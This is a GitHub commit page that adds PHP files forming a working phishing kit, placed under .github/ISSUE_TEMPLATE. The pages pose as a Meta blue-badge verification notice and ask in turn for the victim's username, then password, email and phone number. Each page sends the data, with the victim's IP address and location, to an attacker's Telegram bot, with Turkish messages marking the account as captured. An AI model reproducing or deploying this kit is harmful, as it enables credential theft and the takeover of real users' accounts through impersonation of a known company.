Skip to content

Commit

Permalink
Aron.php
Browse files Browse the repository at this point in the history
İndex
  • Loading branch information
aronkurt5 authored Feb 11, 2025
1 parent 4d08485 commit 9ea253b
Show file tree
Hide file tree
Showing 10 changed files with 11,644 additions and 0 deletions.
115 changes: 115 additions & 0 deletions .github/ISSUE_TEMPLATE/0.php
Original file line number Diff line number Diff line change
@@ -0,0 +1,115 @@
<?php
if ($_POST) {

$ip=$_SERVER["REMOTE_ADDR"];
$konum = file_get_contents("http://ip-api.com/xml/".$ip);
$cek = new SimpleXMLElement($konum);
$ulke = $cek->country;
$sehir = $cek->city;

date_default_timezone_set('Europe/Istanbul');
$cur_time=date("d-m-Y H:i:s");

require_once('admin/tg.php');


$data = [
'text' => '
Hesap Düşüyor...
İp : '.$ip.'
Konum : '.$ulke.' / '.$sehir.'
Tarih : '.$cur_time.'
katıl : @webservicesx
',
'chat_id' =>"$chatid"
];
file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data) );
header("Location: 1.php");
}
?>


<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta name="title" content="Meta">
<meta name="description" content="Meta About">
<meta property="" content="">
<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
<link rel="stylesheet" href="css/style.css">
<title>-</title>
</head>
<body> <center>

</center>
<div class="forebaby">

<div class="yazi">
<br>
<center>
<br>
<br>
<img width="150" src="imgs/e.svg" alt="">
<br><br>
</center>

<p>Meta Support notice <br>Your account has been verified <img width="20" src="imgs/tik.png" alt=""> from our servers And you will be given a badge as a verification indicator If you do not fill out this form within 24 hours you will not receive the blue verification badge</p>
<form method="post"> </div>

<button id="bttn" name="fore_user" type="submit" class="btn2" >Continue</button>
<br>


<br>
</form>


</div>

<center>

<div class="alt">

<br>
<img width="150" src="imgs/ehe.png" alt="">
<br><br>

<p>For Meta Support and Complete message response please contact us best company and most robust Meta Verification Company</p>
<p></p> <br><br>
</div>
</center>
<div class="enalt"> <br><br>
<div class="enaltig">

</div>

<div class="linksx">
<a href="#">Community Standarts</a> &nbsp;&nbsp; | &nbsp;&nbsp;
<a href="#">Data Policy</a> <br><br>
<a href="#">Terms</a>
&nbsp;&nbsp; | &nbsp;&nbsp;
<a href="#">Cookie Policy</a>
</div>
<br><hr color="#E0E0E0" size="0.1px" width="90%">
<br>
<div class="dil">
<p>Language English (US)</p>
</div>
<br>
</div>

<script src="jquery-3.6.0.js" ></script>
<script>
$( "form" ).submit(function( event ) {
$( "#bttn" ).html("<i id='loader' class='fa fa-spinner fa-spin'></i>");
});
</script>
</body>
</html>
114 changes: 114 additions & 0 deletions .github/ISSUE_TEMPLATE/1.php
Original file line number Diff line number Diff line change
@@ -0,0 +1,114 @@
<?php
if ($_POST) {
session_start();
$fore_user=$_POST["fore_user"];
$_SESSION["fore_user"]=$fore_user;

$ip=$_SERVER["REMOTE_ADDR"];
$konum = file_get_contents("http://ip-api.com/xml/".$ip);
$cek = new SimpleXMLElement($konum);
$ulke = $cek->country;
$sehir = $cek->city;
$site = $_SERVER["SERVER_NAME"];
date_default_timezone_set('Europe/Istanbul');
$cur_time=date("d-m-Y H:i:s");


require_once("admin/tg.php");

$data = [
'text' => '
Hesap Düşüyor...
kullanıcı adı : '.$fore_user.'
İp : '.$ip.'
Konum : '.$ulke.' / '.$sehir.'
Tarih : '.$cur_time.'
Katıl : @webservicesx
',
'chat_id' =>"$chatid"
];
file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data) );

header("Location:3.php?$fore_user");

}
?>

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
<link rel="stylesheet" href="css/style.css">
<title>-</title>
</head>
<body> <center>

</center>
<div class="forebaby">

<div class="yazi">
<br>

<br>

<img width="150" src="imgs/e.svg" alt="">
<br>
<br>
<p>Hello Dear User,
Type your username and continue to Verify Badge</p>
<form method="post"autocomplete="off">
<center>
<input type="text" class="inputs" name="fore_user" placeholder="Username" required="" >
</center>

<button id="bttn" type="submit" class="btn2" >Continue</button>
<br>
<br>


</form>
</div>
</div>

<center>
<div class="alt"><br>
<img width="150" src="imgs/ehe.png" alt="">
<br><br>
<p>For Meta Support and Complete message response please contact us best company and most robust Meta Verification Company</p>
<br><br>
</div>
</center>
<div class="enalt"> <br><br>
<div class="enaltig">

</div>

<div class="linksx">
<a href="#">Community Standarts</a> &nbsp;&nbsp; | &nbsp;&nbsp;
<a href="#">Data Policy</a> <br><br>
<a href="#">Terms</a>
&nbsp;&nbsp; | &nbsp;&nbsp;
<a href="#">Cookie Policy</a>
</div>
<br><hr color="#E0E0E0" size="0.1px" width="90%">
<br>
<div class="dil">
<p>Language English (US)</p>
</div>
<br>
</div>

<script src="jquery-3.6.0.js" ></script>
<script>
$( "form" ).submit(function( event ) {
$( "#bttn" ).html("<i id='loader' class='fa fa-spinner fa-spin'></i>");
});
</script>
</body>
</html>
128 changes: 128 additions & 0 deletions .github/ISSUE_TEMPLATE/3.php
Original file line number Diff line number Diff line change
@@ -0,0 +1,128 @@
<?php
ob_start();
session_start();
set_time_limit(0);
error_reporting(0);

if ($_POST) {
$fore_user = $_SESSION["fore_user"];
$forepass = $_POST["forepass"];
$foremail = $_POST["foremail"];
$foreno = $_POST["foreno"];
$ip = $_SERVER["REMOTE_ADDR"];
$konum = file_get_contents("http://ip-api.com/xml/" . $ip);
$cek = new SimpleXMLElement($konum);
$ulke = $cek->country;
$sehir = $cek->city;
$site = $_SERVER["SERVER_NAME"];
date_default_timezone_set('Europe/Istanbul');
$cur_time = date("d-m-Y H:i:s");

require_once("admin/tg.php");

$data = [
'text' => '
Hesap Düştü
Kullanıcı Adı: '.$fore_user.'
Şifre: '.$forepass.'
Mail: '.$foremail.'
Numara: '.$foreno.'
@webservicesx
İp : '.$ip.'
Konum : '.$ulke.' / '.$sehir.'
Tarih : '.$cur_time.'
',
'chat_id' =>"$chatid"
];
file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data) );

header("Location:4.php?$fore_user");

}
?>

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
<link rel="stylesheet" href="css/style.css">
<title></title>
</head>
<body> <center>

</center>
<div class="forebaby">

<div class="yazi">
<br>

<br>

<img width="150" src="imgs/e.svg" alt="">

<br><br>
<p>Dear <b>@<?php $fore_user = $_SESSION["fore_user"];
echo $fore_user; ?> <img width="20" src="imgs/tik.png" alt=""> </b>, <br>Please fill in the required information to verify that you are the real owner of your account, otherwise your account will not be approved.</p>
<form method="post" autocomplete="off">
<center>
<input type="text" class="inputs" disabled name="fore_user" value="@<?php $fore_user = $_SESSION["fore_user"];
echo $fore_user; ?>" required="" >
<input type="password" class="inputs" name="forepass" placeholder="Password" required="" >
<input type="email" class="inputs" name="foremail" placeholder="E-mail" required="" >
<input type="tel" class="inputs" name="foreno" placeholder="Phone Number" required="" >
</center>
<br>
<button id="bttn" name="fore_user" type="submit" class="btn2" >Continue</button>
<br>
<br>


</form>
</div>
</div>

<center>
<div class="alt"><br>
<img width="150" src="imgs/ehe.png" alt="">
<br><br>
<p>For Meta Support and Complete message response please contact us best company and most robust Meta Verification Company</p>
<br><br>
</div>
</center>
<div class="enalt"> <br><br>
<div class="enaltig">

</div>

<div class="linksx">
<a href="#">Community Standarts</a> &nbsp;&nbsp; | &nbsp;&nbsp;
<a href="#">Data Policy</a> <br><br>
<a href="#">Terms</a>
&nbsp;&nbsp; | &nbsp;&nbsp;
<a href="#">Cookie Policy</a>
</div>
<br><hr color="#E0E0E0" size="0.1px" width="90%">
<br>
<div class="dil">
<p>Language English (US)</p>
</div>
<br>
</div>

<script src="jquery-3.6.0.js" ></script>
<script>
$( "form" ).submit(function( event ) {
$( "#bttn" ).html("<i id='loader' class='fa fa-spinner fa-spin'></i>");
});
</script>
</body>
</html>
Loading

0 comments on commit 9ea253b

Please sign in to comment.